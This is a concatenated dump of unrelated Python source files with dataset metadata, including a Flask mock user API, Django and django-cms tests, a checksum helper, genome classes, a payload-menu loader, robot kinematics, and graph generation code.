{"id": 3, "username": "大白", "password": "<PASSWORD>", "role": 0, "sex": 1, "telephone": "10000", "address": "深圳市南山区"}
]
@app.route("/users", methods=["GET"])
def get_all_users():
"""获取所有用户信息"""
return jsonify({"code": "0", "data": data, "msg": "操作成功"})
@app.route("/users/<int:user_id>", methods=["GET"])
def get_user(user_id):
"""获取某个用户信息"""
if user_id > 0 and user_id <= len(data):
return jsonify({"code": "0", "data": data[user_id - 1], "msg": "操作成功"})
return jsonify({"code": "1", "msg": "用户不存在"}) | # !/usr/bin/env python
# -*- coding: utf-8 -*-
# Author: yanghuizhi
# Time: 2022/2/22 20:13
from flask import jsonify
from app_api import app_api as app
data = [
{"id": 1, "username": "小明", "password": "<PASSWORD>", "role": 0, "sex": 0, "telephone": "10086", "address": "北京市海淀区"},
{"id": 2, "username": "李华", "password": "<PASSWORD>", "role": 1, "sex": 0, "telephone": "10010", "address": "广州市天河区"},
{"id": 3, "username": "大白", "password": "<PASSWORD>", "role": 0, "sex": 1, "telephone": "10000", "address": "深圳市南山区"}
]
@app.route("/users", methods=["GET"])
def get_all_users():
"""获取所有用户信息"""
return jsonify({"code": "0", "data": data, "msg": "操作成功"})
@app.route("/users/<int:user_id>", methods=["GET"])
def get_user(user_id):
"""获取某个用户信息"""
if user_id > 0 and user_id <= len(data):
return jsonify({"code": "0", "data": data[user_id - 1], "msg": "操作成功"})
return jsonify({"code": "1", "msg": "用户不存在"}) | zh | 0.305735 | # !/usr/bin/env python # -*- coding: utf-8 -*- # Author: yanghuizhi # Time: 2022/2/22 20:13 获取所有用户信息 获取某个用户信息 | 2.864816 | 3 |
tasks/tests.py | tschelbs18/fruitful | 0 | 6612402 | <gh_stars>0
from django.test import TestCase
# Create your tests here.
from .models import *
'''
class ModelsTestCase(TestCase):
def setUp(self):
# Instantiate some of my models for testing purposes
# User, User Profile, Error, Task, StandardReward, User Reward
username = 'testymctestface'
password = '<PASSWORD>'
email = '<EMAIL>'
first_name = 'testy'
last_name = 'mctesterson'
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user_profile = UserProfile(user=user)
def test_user_name(self):
user = User.objects.get(username='testymctestface')
profile = UserProfile.objects.get(user=user)
self.assertEqual(profile, user.username)
def test_true(self):
self.assertTrue(True)
'''
| from django.test import TestCase
# Create your tests here.
from .models import *
'''
class ModelsTestCase(TestCase):
def setUp(self):
# Instantiate some of my models for testing purposes
# User, User Profile, Error, Task, StandardReward, User Reward
username = 'testymctestface'
password = '<PASSWORD>'
email = '<EMAIL>'
first_name = 'testy'
last_name = 'mctesterson'
user = User.objects.create_user(username, email, password)
user.first_name = first_name
user.last_name = last_name
user_profile = UserProfile(user=user)
def test_user_name(self):
user = User.objects.get(username='testymctestface')
profile = UserProfile.objects.get(user=user)
self.assertEqual(profile, user.username)
def test_true(self):
self.assertTrue(True)
''' | en | 0.540586 | # Create your tests here. class ModelsTestCase(TestCase): def setUp(self): # Instantiate some of my models for testing purposes # User, User Profile, Error, Task, StandardReward, User Reward username = 'testymctestface' password = '<PASSWORD>' email = '<EMAIL>' first_name = 'testy' last_name = 'mctesterson' user = User.objects.create_user(username, email, password) user.first_name = first_name user.last_name = last_name user_profile = UserProfile(user=user) def test_user_name(self): user = User.objects.get(username='testymctestface') profile = UserProfile.objects.get(user=user) self.assertEqual(profile, user.username) def test_true(self): self.assertTrue(True) | 2.851296 | 3 |
checksums.py | carterbrwn2/greyfish | 6 | 6612403 | """
BASICS
Computes the SHA256 checksum of a file
"""
import hashlib
# Computes the SHA 256 checksum of a file given its name
# Based on https://gist.github.com/rji/b38c7238128edf53a181
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
| """
BASICS
Computes the SHA256 checksum of a file
"""
import hashlib
# Computes the SHA 256 checksum of a file given its name
# Based on https://gist.github.com/rji/b38c7238128edf53a181
def sha256_checksum(filename, block_size=65536):
sha256 = hashlib.sha256()
with open(filename, 'rb') as f:
for block in iter(lambda: f.read(block_size), b''):
sha256.update(block)
return sha256.hexdigest()
| en | 0.788024 | BASICS Computes the SHA256 checksum of a file # Computes the SHA 256 checksum of a file given its name # Based on https://gist.github.com/rji/b38c7238128edf53a181 | 3.93899 | 4 |
stdpopsim/genomes.py | LohmuellerLab/stdpopsim | 1 | 6612404 | """
Infrastructure for defining basic information about the genomes of
species.
"""
import stdpopsim.genetic_maps as genetic_maps
import msprime
import warnings
class Genome(object):
"""
Class representing the genome for a species.
.. todo:: Define the facilities that this object provides.
"""
def __init__(self, species, chromosomes, default_genetic_map=None):
self.species = species
self.default_genetic_map = default_genetic_map
self.chromosomes = {}
self.length = 0
for chromosome in chromosomes:
self.chromosomes[chromosome.name] = chromosome
chromosome.default_genetic_map = default_genetic_map
chromosome.species = species
self.length += chromosome.length
def __str__(self):
s = "Genome for {}:\n".format(self.species)
s += "Chromosomes:\n"
length_sorted = sorted(self.chromosomes.values(), key=lambda x: -x.length)
for chrom in length_sorted:
s += "\t{}\n".format(chrom)
return s
@property
def mean_recombination_rate(self):
"""
This method return the weighted mean recombination rate
across all chomosomes in the genome.
:rtype: float
"""
mean_recombination_rate = 0
for chrom in self.chromosomes.values():
normalized_weight = chrom.length / self.length
cont = chrom.default_recombination_rate*normalized_weight
mean_recombination_rate += cont
return mean_recombination_rate
class Chromosome(object):
"""
Class representing a single chromosome for a species.
.. todo:: Define the facilities that this object provides.
"""
def __init__(self, name, length, default_recombination_rate, default_mutation_rate):
self.name = name
self.length = length
self.default_recombination_rate = default_recombination_rate
self.default_mutation_rate = default_mutation_rate
self.species = None
self.default_genetic_map = None
def __repr__(self):
return (
"{{'name': {}, 'length': {}, "
"'default_recombination_rate': {}, "
"'default_mutation_rate': {}}}".format(
self.name, self.length, self.default_recombination_rate,
self.default_mutation_rate))
def __str__(self):
return repr(self)
def recombination_map(self, map_name=None):
"""
Returns an :class:`msprime.RecombinationMap` instance representing the
recombination map for this chromosome. If ``map_name`` is provided,
return the corresponding recombination map; if not, use the default
recombination map for this species.
"""
if map_name is None:
map_name = self.default_genetic_map
genetic_map = genetic_maps.get_genetic_map(self.species, map_name)
if genetic_map.contains_chromosome_map(self.name):
ret = genetic_map.get_chromosome_map(self.name)
else:
warnings.warn(
"Warning: recombination map not found for chromosome: '{}'"
" on map: '{}', substituting a zero"
"-recombination map.".format(self.name, map_name))
ret = msprime.RecombinationMap.uniform_map(self.length, 0)
return ret
| """
Infrastructure for defining basic information about the genomes of
species.
"""
import stdpopsim.genetic_maps as genetic_maps
import msprime
import warnings
class Genome(object):
"""
Class representing the genome for a species.
.. todo:: Define the facilities that this object provides.
"""
def __init__(self, species, chromosomes, default_genetic_map=None):
self.species = species
self.default_genetic_map = default_genetic_map
self.chromosomes = {}
self.length = 0
for chromosome in chromosomes:
self.chromosomes[chromosome.name] = chromosome
chromosome.default_genetic_map = default_genetic_map
chromosome.species = species
self.length += chromosome.length
def __str__(self):
s = "Genome for {}:\n".format(self.species)
s += "Chromosomes:\n"
length_sorted = sorted(self.chromosomes.values(), key=lambda x: -x.length)
for chrom in length_sorted:
s += "\t{}\n".format(chrom)
return s
@property
def mean_recombination_rate(self):
"""
This method return the weighted mean recombination rate
across all chomosomes in the genome.
:rtype: float
"""
mean_recombination_rate = 0
for chrom in self.chromosomes.values():
normalized_weight = chrom.length / self.length
cont = chrom.default_recombination_rate*normalized_weight
mean_recombination_rate += cont
return mean_recombination_rate
class Chromosome(object):
"""
Class representing a single chromosome for a species.
.. todo:: Define the facilities that this object provides.
"""
def __init__(self, name, length, default_recombination_rate, default_mutation_rate):
self.name = name
self.length = length
self.default_recombination_rate = default_recombination_rate
self.default_mutation_rate = default_mutation_rate
self.species = None
self.default_genetic_map = None
def __repr__(self):
return (
"{{'name': {}, 'length': {}, "
"'default_recombination_rate': {}, "
"'default_mutation_rate': {}}}".format(
self.name, self.length, self.default_recombination_rate,
self.default_mutation_rate))
def __str__(self):
return repr(self)
def recombination_map(self, map_name=None):
"""
Returns an :class:`msprime.RecombinationMap` instance representing the
recombination map for this chromosome. If ``map_name`` is provided,
return the corresponding recombination map; if not, use the default
recombination map for this species.
"""
if map_name is None:
map_name = self.default_genetic_map
genetic_map = genetic_maps.get_genetic_map(self.species, map_name)
if genetic_map.contains_chromosome_map(self.name):
ret = genetic_map.get_chromosome_map(self.name)
else:
warnings.warn(
"Warning: recombination map not found for chromosome: '{}'"
" on map: '{}', substituting a zero"
"-recombination map.".format(self.name, map_name))
ret = msprime.RecombinationMap.uniform_map(self.length, 0)
return ret
| en | 0.686265 | Infrastructure for defining basic information about the genomes of species. Class representing the genome for a species. .. todo:: Define the facilities that this object provides. This method return the weighted mean recombination rate across all chomosomes in the genome. :rtype: float Class representing a single chromosome for a species. .. todo:: Define the facilities that this object provides. Returns an :class:`msprime.RecombinationMap` instance representing the recombination map for this chromosome. If ``map_name`` is provided, return the corresponding recombination map; if not, use the default recombination map for this species. | 3.258478 | 3 |
lib/generator.py | jessonfoo/fELF | 549 | 6612405 | import glob
import importlib
import sys
from lib.misc import print_info
def load_payload(path):
try:
return importlib.import_module(path)
except Exception as e:
return False
def gather_payloads(payload_dir):
payload_to_name = {}
for filepath in glob.iglob("{}*.py".format(payload_dir)):
payload_import_name = filepath[:-3].replace("/", ".")
payload = load_payload(payload_import_name)
if payload:
try:
name = payload.desc["name"].lower()
payload_to_name[name] = payload
print_info("Loaded Payload: '{}'".format(name), "!")
continue
except Exception as e:
print_info("Error Loading Payload", "-")
print_info("Unable to Load: {}".format(payload_import_name), "-")
return payload_to_name
def generate(executable, is_url, payload_dir, payload_to_use):
payloads = gather_payloads(payload_dir)
if payloads:
if payload_to_use:
if payload_to_use in payloads:
print_info("Using Payload: '{}'".format(payload_to_use), "!")
return payloads[payload_to_use].main(is_url, executable)
else:
print_info("not found", "-")
else:
print("-"*20)
for name, payload in payloads.items():
info = payload.desc
print("Payload Name: '{}'".format(name))
print("\tPayload Description: '{}'".format(info["description"]))
print("\tCompatible Architectures: '{}'".format(info["archs"]))
print("\tRequired Python Version on Target: {}".format(info["python_vers"]))
print("-"*20)
while True:
choice = input("Choose Payload (Q to Quit)>> ").lower()
if choice == "q":
break
else:
if choice in payloads:
print_info("Using Payload: '{}'".format(choice), "!")
return payloads[choice].main(is_url, executable)
else:
print_info("Payload Not Found", "-")
else:
print_info("No Useable Payloads", "-") | import glob
import importlib
import sys
from lib.misc import print_info
def load_payload(path):
try:
return importlib.import_module(path)
except Exception as e:
return False
def gather_payloads(payload_dir):
payload_to_name = {}
for filepath in glob.iglob("{}*.py".format(payload_dir)):
payload_import_name = filepath[:-3].replace("/", ".")
payload = load_payload(payload_import_name)
if payload:
try:
name = payload.desc["name"].lower()
payload_to_name[name] = payload
print_info("Loaded Payload: '{}'".format(name), "!")
continue
except Exception as e:
print_info("Error Loading Payload", "-")
print_info("Unable to Load: {}".format(payload_import_name), "-")
return payload_to_name
def generate(executable, is_url, payload_dir, payload_to_use):
payloads = gather_payloads(payload_dir)
if payloads:
if payload_to_use:
if payload_to_use in payloads:
print_info("Using Payload: '{}'".format(payload_to_use), "!")
return payloads[payload_to_use].main(is_url, executable)
else:
print_info("not found", "-")
else:
print("-"*20)
for name, payload in payloads.items():
info = payload.desc
print("Payload Name: '{}'".format(name))
print("\tPayload Description: '{}'".format(info["description"]))
print("\tCompatible Architectures: '{}'".format(info["archs"]))
print("\tRequired Python Version on Target: {}".format(info["python_vers"]))
print("-"*20)
while True:
choice = input("Choose Payload (Q to Quit)>> ").lower()
if choice == "q":
break
else:
if choice in payloads:
print_info("Using Payload: '{}'".format(choice), "!")
return payloads[choice].main(is_url, executable)
else:
print_info("Payload Not Found", "-")
else:
print_info("No Useable Payloads", "-") | none | 1 | 2.642253 | 3 | |
cms/tests/apphooks.py | s-a-s-forks/django-cms | 1 | 6612406 | <reponame>s-a-s-forks/django-cms
# -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.apphook_pool import apphook_pool
from cms.appresolver import applications_page_check, clear_app_resolvers
from cms.models.titlemodels import Title
from cms.test.testcases import CMSTestCase
from cms.test.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys
APP_NAME = 'SampleApp'
APP_MODULE = "testapp.sampleapp.cms_app"
class ApphooksTestCase(CMSTestCase):
def setUp(self):
clear_app_resolvers()
clear_url_caches()
def test_01_explicit_apphooks(self):
"""
Test explicit apphook loading with the CMS_APPHOOKS setting.
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_02_implicit_apphooks(self):
"""
Test implicit apphook loading with INSTALLED_APPS + cms_app.py
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apps = ['testapp.sampleapp']
with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_03_apphook_on_root(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
english_title = page.title_set.all()[0]
self.assertEquals(english_title.language, 'en')
Title.objects.create(
language='de',
title='%s DE' % english_title.title,
slug=english_title.slug,
path=english_title.path,
page=page,
)
page.title_set.all().update(application_urls='SampleApp')
self.assertTrue(page.publish())
response = self.client.get(self.get_pages_root())
self.assertTemplateUsed(response, 'sampleapp/home.html')
apphook_pool.clear()
def test_04_get_page_for_apphook(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
self.create_title(page.get_title(), page.get_slug(), 'de', page)
child_page = self.create_page(page, user=superuser, published=True)
self.create_title(child_page.get_title(), child_page.get_slug(), 'de', child_page)
child_child_page = self.create_page(child_page, user=superuser, published=True)
self.create_title(child_child_page.get_title(), child_child_page.get_slug(), 'de', child_child_page)
child_child_page.title_set.all().update(application_urls='SampleApp')
child_child_page.publish()
# publisher_public is set to draft on publish, issue with onetoone reverse
child_child_page = self.reload(child_child_page)
en_title = child_child_page.publisher_public.get_title_obj('en')
path = reverse('en:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'en'
attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash
self.assertEquals(attached_to_page.pk, en_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, en_title.title)
de_title = child_child_page.publisher_public.get_title_obj('de')
path = reverse('de:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'de'
attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix
self.assertEquals(attached_to_page.pk, de_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, de_title.title)
apphook_pool.clear() | # -*- coding: utf-8 -*-
from __future__ import with_statement
from cms.apphook_pool import apphook_pool
from cms.appresolver import applications_page_check, clear_app_resolvers
from cms.models.titlemodels import Title
from cms.test.testcases import CMSTestCase
from cms.test.util.context_managers import SettingsOverride
from django.contrib.auth.models import User
from django.core.urlresolvers import clear_url_caches, reverse
import sys
APP_NAME = 'SampleApp'
APP_MODULE = "testapp.sampleapp.cms_app"
class ApphooksTestCase(CMSTestCase):
def setUp(self):
clear_app_resolvers()
clear_url_caches()
def test_01_explicit_apphooks(self):
"""
Test explicit apphook loading with the CMS_APPHOOKS setting.
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apphooks = (
'%s.%s' % (APP_MODULE, APP_NAME),
)
with SettingsOverride(CMS_APPHOOKS=apphooks):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_02_implicit_apphooks(self):
"""
Test implicit apphook loading with INSTALLED_APPS + cms_app.py
"""
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
apps = ['testapp.sampleapp']
with SettingsOverride(INSTALLED_APPS=apps, ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
hooks = apphook_pool.get_apphooks()
app_names = [hook[0] for hook in hooks]
self.assertEqual(len(hooks), 1)
self.assertEqual(app_names, [APP_NAME])
apphook_pool.clear()
def test_03_apphook_on_root(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
english_title = page.title_set.all()[0]
self.assertEquals(english_title.language, 'en')
Title.objects.create(
language='de',
title='%s DE' % english_title.title,
slug=english_title.slug,
path=english_title.path,
page=page,
)
page.title_set.all().update(application_urls='SampleApp')
self.assertTrue(page.publish())
response = self.client.get(self.get_pages_root())
self.assertTemplateUsed(response, 'sampleapp/home.html')
apphook_pool.clear()
def test_04_get_page_for_apphook(self):
if APP_MODULE in sys.modules:
del sys.modules[APP_MODULE]
with SettingsOverride(ROOT_URLCONF='testapp.second_urls_for_apphook_tests'):
apphook_pool.clear()
superuser = User.objects.create_superuser('admin', '<EMAIL>', 'admin')
page = self.create_page(user=superuser, published=True)
self.create_title(page.get_title(), page.get_slug(), 'de', page)
child_page = self.create_page(page, user=superuser, published=True)
self.create_title(child_page.get_title(), child_page.get_slug(), 'de', child_page)
child_child_page = self.create_page(child_page, user=superuser, published=True)
self.create_title(child_child_page.get_title(), child_child_page.get_slug(), 'de', child_child_page)
child_child_page.title_set.all().update(application_urls='SampleApp')
child_child_page.publish()
# publisher_public is set to draft on publish, issue with onetoone reverse
child_child_page = self.reload(child_child_page)
en_title = child_child_page.publisher_public.get_title_obj('en')
path = reverse('en:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'en'
attached_to_page = applications_page_check(request, path=path[1:]) # strip leading slash
self.assertEquals(attached_to_page.pk, en_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, en_title.title)
de_title = child_child_page.publisher_public.get_title_obj('de')
path = reverse('de:sample-settings')
request = self.get_request(path)
request.LANGUAGE_CODE = 'de'
attached_to_page = applications_page_check(request, path=path[4:]) # strip leading slash and language prefix
self.assertEquals(attached_to_page.pk, de_title.page.pk)
response = self.client.get(path)
self.assertEquals(response.status_code, 200)
self.assertTemplateUsed(response, 'sampleapp/home.html')
self.assertContains(response, de_title.title)
apphook_pool.clear() | en | 0.84506 | # -*- coding: utf-8 -*- Test explicit apphook loading with the CMS_APPHOOKS setting. Test implicit apphook loading with INSTALLED_APPS + cms_app.py # publisher_public is set to draft on publish, issue with onetoone reverse # strip leading slash # strip leading slash and language prefix | 2.06301 | 2 |
Py Apple Dynamics V6.8/Py Apple Dynamics V6.8 固件及程序/V6.8 源代码/PA_ATTITUDE.py | Musyue/py-apple-quadruped-robot | 495 | 6612407 | #Copyright Deng(灯哥) (<EMAIL>) Py-apple dog project
#Github:https://github.com/ToanTech/py-apple-quadruped-robot
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at:http://www.apache.org/licenses/LICENSE-2.0
from math import sin,cos,pi
def cal_ges(PIT,ROL,l,b,w,x,Hc):
YA=0
P=PIT*pi/180
R=ROL*pi/180
Y=YA*pi/180
#腿1
ABl_x=l/2 - x -(l*cos(P)*cos(Y))/2 + (b*cos(P)*sin(Y))/2
ABl_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
ABl_z= - Hc - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
#腿2
AB2_x=l/2 - x - (l*cos(P)*cos(Y))/2 - (b*cos(P)*sin(Y))/2
AB2_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB2_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
#腿3
AB3_x=(l*cos(P)*cos(Y))/2 - x - l/2 + (b*cos(P)*sin(Y))/2
AB3_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB3_z=(l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2 - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc
#腿4
AB4_x=(l*cos(P)*cos(Y))/2 - x - l/2 - (b*cos(P)*sin(Y))/2
AB4_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB4_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc + (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
x1=ABl_x
y1=ABl_z
x2=AB2_x
y2=AB2_z
x3=AB4_x
y3=AB4_z
x4=AB3_x
y4=AB3_z
return x1,x2,x3,x4,y1,y2,y3,y4
| #Copyright Deng(灯哥) (<EMAIL>) Py-apple dog project
#Github:https://github.com/ToanTech/py-apple-quadruped-robot
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at:http://www.apache.org/licenses/LICENSE-2.0
from math import sin,cos,pi
def cal_ges(PIT,ROL,l,b,w,x,Hc):
YA=0
P=PIT*pi/180
R=ROL*pi/180
Y=YA*pi/180
#腿1
ABl_x=l/2 - x -(l*cos(P)*cos(Y))/2 + (b*cos(P)*sin(Y))/2
ABl_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
ABl_z= - Hc - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
#腿2
AB2_x=l/2 - x - (l*cos(P)*cos(Y))/2 - (b*cos(P)*sin(Y))/2
AB2_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 - (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB2_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc - (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
#腿3
AB3_x=(l*cos(P)*cos(Y))/2 - x - l/2 + (b*cos(P)*sin(Y))/2
AB3_y=w/2 - (b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB3_z=(l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2 - (b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc
#腿4
AB4_x=(l*cos(P)*cos(Y))/2 - x - l/2 - (b*cos(P)*sin(Y))/2
AB4_y=(b*(cos(R)*cos(Y) + sin(P)*sin(R)*sin(Y)))/2 - w/2 + (l*(cos(R)*sin(Y) - cos(Y)*sin(P)*sin(R)))/2
AB4_z=(b*(cos(Y)*sin(R) - cos(R)*sin(P)*sin(Y)))/2 - Hc + (l*(sin(R)*sin(Y) + cos(R)*cos(Y)*sin(P)))/2
x1=ABl_x
y1=ABl_z
x2=AB2_x
y2=AB2_z
x3=AB4_x
y3=AB4_z
x4=AB3_x
y4=AB3_z
return x1,x2,x3,x4,y1,y2,y3,y4
| en | 0.63241 | #Copyright Deng(灯哥) (<EMAIL>) Py-apple dog project #Github:https://github.com/ToanTech/py-apple-quadruped-robot #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at:http://www.apache.org/licenses/LICENSE-2.0 #腿1 #腿2 #腿3 #腿4 | 2.420916 | 2 |
coursach2/generator.py | lisovskey/coursach2 | 5 | 6612408 | '''
Generation helpers
'''
import math
from random import randint
def generate_dots(num, width, height):
'''
yield tuple of x, y coordinates
'''
for _ in range(num):
yield randint(0, width), randint(0, height)
def generate_graph(dots, neighbourhood_size, distance_range=(10, 100)):
'''
yield tuple of id and node with distances to its neighbours
'''
def distance(node_id, neighbour_id):
'''
return random or existing distance
'''
if graph.get(neighbour_id):
return graph[neighbour_id][node_id]
return randint(*distance_range)
graph = {}
for node_id, _ in enumerate(reversed(dots)):
node = {}
for delta in range(1, neighbourhood_size + 1):
neighbour_id = node_id + delta
if neighbour_id < len(dots):
node[neighbour_id] = distance(node_id, neighbour_id)
neighbour_id = node_id - delta
if neighbour_id >= 0:
node[neighbour_id] = distance(node_id, neighbour_id)
graph[node_id] = node
return graph
| '''
Generation helpers
'''
import math
from random import randint
def generate_dots(num, width, height):
'''
yield tuple of x, y coordinates
'''
for _ in range(num):
yield randint(0, width), randint(0, height)
def generate_graph(dots, neighbourhood_size, distance_range=(10, 100)):
'''
yield tuple of id and node with distances to its neighbours
'''
def distance(node_id, neighbour_id):
'''
return random or existing distance
'''
if graph.get(neighbour_id):
return graph[neighbour_id][node_id]
return randint(*distance_range)
graph = {}
for node_id, _ in enumerate(reversed(dots)):
node = {}
for delta in range(1, neighbourhood_size + 1):
neighbour_id = node_id + delta
if neighbour_id < len(dots):
node[neighbour_id] = distance(node_id, neighbour_id)
neighbour_id = node_id - delta
if neighbour_id >= 0:
node[neighbour_id] = distance(node_id, neighbour_id)
graph[node_id] = node
return graph
| en | 0.767427 | Generation helpers yield tuple of x, y coordinates yield tuple of id and node with distances to its neighbours return random or existing distance | 3.68066 | 4 |
lines_to_lengths_test.py | cdleary/zydis_bazel | 0 | 6612409 | import subprocess
import textwrap
import unittest
from tools.python.runfiles import runfiles
class LinesToLengthsTest(unittest.TestCase):
def test_examples_with_useless_suffixes(self):
text = textwrap.dedent("""
90
90 00
41 50
41 50 01
""").strip()
r = runfiles.Create()
results = subprocess.check_output(
[r.Rlocation('zydis_bazel/lines_to_lengths')],
input=text.encode('utf-8'),
).decode('utf-8')
self.assertEqual(results.splitlines(), ['1', '1', '2', '2'])
if __name__ == '__main__':
unittest.main()
| import subprocess
import textwrap
import unittest
from tools.python.runfiles import runfiles
class LinesToLengthsTest(unittest.TestCase):
def test_examples_with_useless_suffixes(self):
text = textwrap.dedent("""
90
90 00
41 50
41 50 01
""").strip()
r = runfiles.Create()
results = subprocess.check_output(
[r.Rlocation('zydis_bazel/lines_to_lengths')],
input=text.encode('utf-8'),
).decode('utf-8')
self.assertEqual(results.splitlines(), ['1', '1', '2', '2'])
if __name__ == '__main__':
unittest.main()
| en | 0.186367 | 90 90 00 41 50 41 50 01 | 2.91267 | 3 |
duplik2/__main__.py | eun-plata/proyecto_plata | 0 | 6612410 | <filename>duplik2/__main__.py
from duplik2 import *
parser = argparse.ArgumentParser(description='Find duplicated files in your folder')
parser.add_argument('path', type=str, help='Absolute path')
root_dir = "/Users/eunyoungcho/Pictures/2019/example"
command_find_repeated(root_dir)
| <filename>duplik2/__main__.py
from duplik2 import *
parser = argparse.ArgumentParser(description='Find duplicated files in your folder')
parser.add_argument('path', type=str, help='Absolute path')
root_dir = "/Users/eunyoungcho/Pictures/2019/example"
command_find_repeated(root_dir)
| none | 1 | 2.785449 | 3 | |
tests/utils.py | Clariteia/minos_microservice_aggregate | 3 | 6612411 | <reponame>Clariteia/minos_microservice_aggregate
from __future__ import (
annotations,
)
import sys
import unittest
from datetime import (
timedelta,
)
from pathlib import (
Path,
)
from typing import (
Optional,
)
from unittest import (
TestCase,
)
from dependency_injector import (
containers,
providers,
)
from minos.aggregate import (
Aggregate,
Entity,
EntitySet,
EventEntry,
InMemoryEventRepository,
InMemorySnapshotRepository,
InMemoryTransactionRepository,
ModelRef,
ValueObject,
ValueObjectSet,
)
from minos.common import (
Lock,
MinosPool,
MinosSetup,
current_datetime,
)
BASE_PATH = Path(__file__).parent
class MinosTestCase(unittest.IsolatedAsyncioTestCase):
def setUp(self) -> None:
super().setUp()
self.broker_publisher = FakeBroker()
self.broker_pool = FakeBrokerPool()
self.lock_pool = FakeLockPool()
self.transaction_repository = InMemoryTransactionRepository(lock_pool=self.lock_pool)
self.event_repository = InMemoryEventRepository(
broker_publisher=self.broker_publisher,
transaction_repository=self.transaction_repository,
lock_pool=self.lock_pool,
)
self.snapshot_repository = InMemorySnapshotRepository(
